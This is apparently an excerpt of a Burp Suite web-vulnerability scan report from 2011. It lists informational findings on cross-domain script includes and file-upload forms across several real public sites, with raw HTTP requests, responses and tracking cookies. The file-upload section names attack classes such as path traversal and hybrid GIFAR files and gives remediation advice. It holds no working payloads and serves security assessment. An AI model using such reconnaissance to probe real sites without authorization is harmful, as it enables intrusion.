Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 14:12:15 GMT
Connection: close
Content-Length: 70107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
EmailFrien
...[SNIP]...
<div id="twitter-following">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<div class="dsq-widget"><script type="text/javascript" src="http://disqus.com/forums/scmagazine/recent_comments_widget.js?num_items=5&hide_avatars=1&avatar_size=32&excerpt_length=200"></script>
...[SNIP]...
<div class="dsq-widget"><script type="text/javascript" src="http://disqus.com/forums/scmagazine/popular_threads_widget.js?num_items=10"></script>
...[SNIP]...
</legend>
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//secure-au.imrworldwide.com/v53.js"></script>
...[SNIP]...

16.104. http://www.securelist.com/en/blog/2312/Another_live_XSS_vulnerability previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.securelist.com
Path:	/en/blog/2312/Another_live_XSS_vulnerability

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?pub=securelist

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 14:13:38 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: Accept-Encoding
X-Showed: kaspen:vl:klblog=2312;vlyrub=8;vlxhtml=101
Content-Length: 21589

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Another live XSS vulnerability - Securelist</title>

<link rel="alternate" type="application/rss+xml" title="Securel
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=securelist"></script>
...[SNIP]...

16.105. http://www.sophelle.com/Services/eCommerce-Cross-Channel-Strategy-Operations.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/Services/eCommerce-Cross-Channel-Strategy-Operations.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /Services/eCommerce-Cross-Channel-Strategy-Operations.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=227204639.668059565.1315148193.1315148193.1315148193.1; __utmb=227204639.1.10.1315148193; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-04%2010%3A55%3A54; hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54

Response

HTTP/1.1 200 OK
Content-Length: 9852
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:17:45 GMT
Accept-Ranges: bytes
ETag: "d88d9c54144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 14:54:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon"
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=bdantz"></script>
...[SNIP]...

16.106. http://www.sophelle.com/Success-Stories/Automated-Website-Testing.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/Success-Stories/Automated-Website-Testing.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /Success-Stories/Automated-Website-Testing.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotdt=2011-09-04%2010%3A55%3A54; hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; __utma=227204639.668059565.1315148193.1315148193.1315148193.1; __utmb=227204639.2.10.1315148193; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Length: 9759
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:17:55 GMT
Accept-Ranges: bytes
ETag: "0bf755a144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 14:54:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon"
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=bdantz"></script>
...[SNIP]...

16.107. http://www.sophelle.com/Success-Stories/Project-Lifecycle-Re-Engineering.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/Success-Stories/Project-Lifecycle-Re-Engineering.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /Success-Stories/Project-Lifecycle-Re-Engineering.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Success-Stories/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; __utma=227204639.668059565.1315148193.1315148193.1315148193.1; __utmb=227204639.7.10.1315148193; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-04%2010%3A56%3A09

Response

HTTP/1.1 200 OK
Content-Length: 12239
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:18:03 GMT
Accept-Ranges: bytes
ETag: "f689415f144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 14:54:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon"
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=bdantz"></script>
...[SNIP]...

16.108. http://www.spamfighter.com/News-16694-Skype-Vulnerability-Makes-End-Users-Susceptible-to-Malware-Execution.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.spamfighter.com
Path:	/News-16694-Skype-Vulnerability-Makes-End-Users-Susceptible-to-Malware-Execution.htm

Issue detail

The response dynamically includes the following script from another domain:

http://w.sharethis.com/button/buttons.js

Request

GET /News-16694-Skype-Vulnerability-Makes-End-Users-Susceptible-to-Malware-Execution.htm HTTP/1.1
Host: www.spamfighter.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/#sclient=psy&hl=en&tbm=nws&source=hp&q=%22xss.cx%22&pbx=1&oq=%22xss.cx%22&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0&fp=1&biw=1407&bih=931&bav=on.2,or.r_gc.r_pw.&cad=b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Length: 28026
Date: Sun, 04 Sep 2011 12:12:55 GMT
Connection: close
Cache-Control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equ
...[SNIP]...
</script><script src="http://w.sharethis.com/button/buttons.js" type="text/javascript"></script>
...[SNIP]...

16.109. http://www.stumbleupon.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stumbleupon.com
Path:	/submit

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://cdn.stumble-upon.com/js/attach_su.js?v=20110819-00
http://cdn.stumble-upon.com/js/plugins_su.js?v=20110819-00

Request

GET /submit HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 7352
Date: Sun, 04 Sep 2011 14:14:42 GMT
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<![endif]-->


           <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<![endif]-->
   <script type="text/javascript" src="http://cdn.stumble-upon.com/js/plugins_su.js?v=20110819-00"></script>
...[SNIP]...


   <script type="text/javascript" charset="utf-8" src="http://cdn.stumble-upon.com/js/attach_su.js?v=20110819-00"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js?ver=1.4.4
http://s.gravatar.com/js/gprofiles.js?u&ver=3.1.4
http://stats.wordpress.com/e-201135.js

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:14:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:14:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
</script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js?ver=1.4.4'></script>
...[SNIP]...
</div><script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?u&ver=3.1.4'></script>
...[SNIP]...
</div>

<script src="http://stats.wordpress.com/e-201135.js" type="text/javascript"></script>
...[SNIP]...

16.111. http://www.theregister.co.uk/2011/08/22/skype_security_bug/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theregister.co.uk
Path:	/2011/08/22/skype_security_bug/

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /2011/08/22/skype_security_bug/ HTTP/1.1
Host: www.theregister.co.uk
Proxy-Connection: keep-alive
Referer: http://www.google.com/#sclient=psy&hl=en&tbm=nws&source=hp&q=%22xss.cx%22&pbx=1&oq=%22xss.cx%22&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0&fp=1&biw=1407&bih=931&bav=on.2,or.r_gc.r_pw.&cad=b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:12:52 GMT
Server: Apache/2.2.16 (Debian)
Accept-Ranges: bytes
Cache-Control: max-age=1800
Expires: Sun, 04 Sep 2011 12:42:52 GMT
Vary: Accept-Encoding
Content-Length: 27038
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<titl
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

16.112. http://www.theregister.co.uk/Design/javascript/_.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theregister.co.uk
Path:	/Design/javascript/_.js

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/N6978/adj/'+;unitnum='+(T-1),P2,p,R].join(';')+'?
http://api.chatcatcher.com/ccwidgets/ccwidget1.1.js
http://maps.google.com/maps/api/js?sensor=false&v=3&&callback=GMapRegCb

Request

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:12:53 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Thu, 01 Sep 2011 15:43:08 GMT
ETag: "211c1-4abe319f11b00"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Mon, 05 Sep 2011 12:12:53 GMT
Vary: Accept-Encoding
Content-Length: 135617
Content-Type: application/javascript

/*!
* jQuery JavaScript Library v1.5.1
* http://jquery.com/
*
* Copyright 2011, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
:0);if(typeof vcs!='undefined')
P2+=';vc=';$.each(vcs,function(){P2+=this+','});P2+='x.x';if(Mob)
z=z.replace(/^([a-z]+)_([a-z]+)\/([a-z]+)$/i,"mob/$1__$2__$3");if($('#ad-'+n+'-spot').length){var tag='<script type="text/javascript" src="http://ad.doubleclick.net/N6978/adj/'+
[z,'tile='+T++ +';unitnum='+(T-1),P2,p,R].join(';')+'?"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://api.chatcatcher.com/ccwidgets/ccwidget1.1.js"></script>
...[SNIP]...
ypes){link='#body a[rel=x-google'+MapTypes[map_type]+']';if($(link).length){type=MapTypes[map_type];$.getScript('http://dda.regmedia.co.uk/GMaps/'+MapTypes[map_type]+'.js',GMapRegCb);$('head').append('<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false&v=3&&callback=GMapRegCb"></script>
...[SNIP]...

16.113. http://www.whatisnetwork.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET / HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:15:25 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sun, 04 Sep 2011 13:54:51 GMT
Accept-Ranges: bytes
Content-Length: 47015
Vary: Accept-Encoding,Cookie
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="en
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

16.114. http://www.whatisnetwork.com/news-events/114520/kaspersky-website-vulnerable-to-xss.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/news-events/114520/kaspersky-website-vulnerable-to-xss.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /news-events/114520/kaspersky-website-vulnerable-to-xss.html HTTP/1.1
Host: www.whatisnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=site%3Axss.cx+usa.kapersky.com#sclient=psy&hl=en&tbo=1&tbs=qdr:d&source=hp&q=kapersky+xss&pbx=1&oq=kapersky+xss&aq=f&aqi=g-s5&aql=&gs_sm=e&gs_upl=40940l44815l1l44931l28l13l12l0l0l3l1252l5070l4-1.1.2.2l7l0&tbo=1&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 13:54:46 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Sun, 04 Sep 2011 13:54:46 GMT
Content-Type: text/html
Content-Length: 59029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="en
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

16.115. http://www.youtube.com/results previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/results

Issue detail

The response dynamically includes the following script from another domain:

http://s.ytimg.com/yt/jsbin/www-core-vflatRxZ9.js

Request

GET /results HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17. File upload functionality previous next
There are 5 instances of this issue:

http://devirusare.com/x26amp
http://support.kasperskyamericas.com/corporate/open-support-case
http://translate.google.com/
http://www.securelist.com/en/
http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:

File path traversal
Persistent cross-site scripting
Placing of other client-executable code into the domain
Transmission of viruses and other malware
Denial of service

You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Whether uploaded content can subsequently be downloaded via a URL within the application.
What Content-type and Content-disposition headers the application returns when the file's content is downloaded.
Whether it is possible to place executable HTML/JavaScript into the file, which executes when the file's contents are viewed.
Whether the application performs any filtering on the file extension or MIME type of the uploaded file.
Whether it is possible to construct a hybrid file containing both executable and non-executable content, to bypass any content filters - for example, a file containing both a GIF image and a Java archive (known as a GIFAR file).
What location is used to store uploaded content, and whether it is possible to supply a crafted filename to escape from this location.
Whether archive formats such as ZIP are unpacked by the application.
How the application handles attempts to upload very large files, or decompression bomb files.

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Use a server-generated filename if storing uploaded files on disk.
Inspect the content of uploaded files, and enforce a whitelist of accepted, non-executable content types. Additionally, enforce a blacklist of common executable formats, to hinder hybrid file attacks.
Enforce a whitelist of accepted, non-executable file extensions.
If uploaded files are downloaded by users, supply an accurate non-generic Content-type header, and also a Content-disposition header which specifies that browsers should handle the file as an attachment.
Enforce a size limit on uploaded files (for defence-in-depth, this can be implemented both within application code and in the web server's configuration.
Reject attempts to upload archive formats such as ZIP.

17.1. http://devirusare.com/x26amp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://devirusare.com
Path:	/x26amp

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://www.virustotal.com/vt/en/recepcion

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /x26amp HTTP/1.1
Host: devirusare.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.2. http://support.kasperskyamericas.com/corporate/open-support-case previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kasperskyamericas.com
Path:	/corporate/open-support-case

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://support.kasperskyamericas.com/corporate/open-support-case

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:00:58 GMT
Server: Apache
Last-Modified: Sun, 04 Sep 2011 02:22:54 GMT
ETag: "2921-4ac14459bbb80"
Accept-Ranges: bytes
Content-Length: 52051
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
</label>
<input type="file" name="files[describe_your_issue_attach_files]" class="form-file" id="edit-describe-your-issue-attach-files" size="60" />

<div class="description">
...[SNIP]...

17.3. http://translate.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://translate.google.com
Path:	/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://translate.google.com/

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET / HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.4. http://www.securelist.com/en/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.securelist.com
Path:	/en/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://www.securelist.com/en/scanner

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 14:00:27 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: Accept-Encoding
X-Showed: kaspen:vl:kavhtml=207810888;vlyrub=1;vlxhtml=101
Content-Length: 36254

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Securelist - Information about Viruses, Hackers and Spam</title>

<link rel="alternate" type="application/rss+xml" t
...[SNIP]...
</div>
<input type="file" name="file" id="file" size="1" class="newfile" onchange="showNameFile(this)"></input>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:14:43 GMT
Server: Apache/2.2.3 (Red Hat)
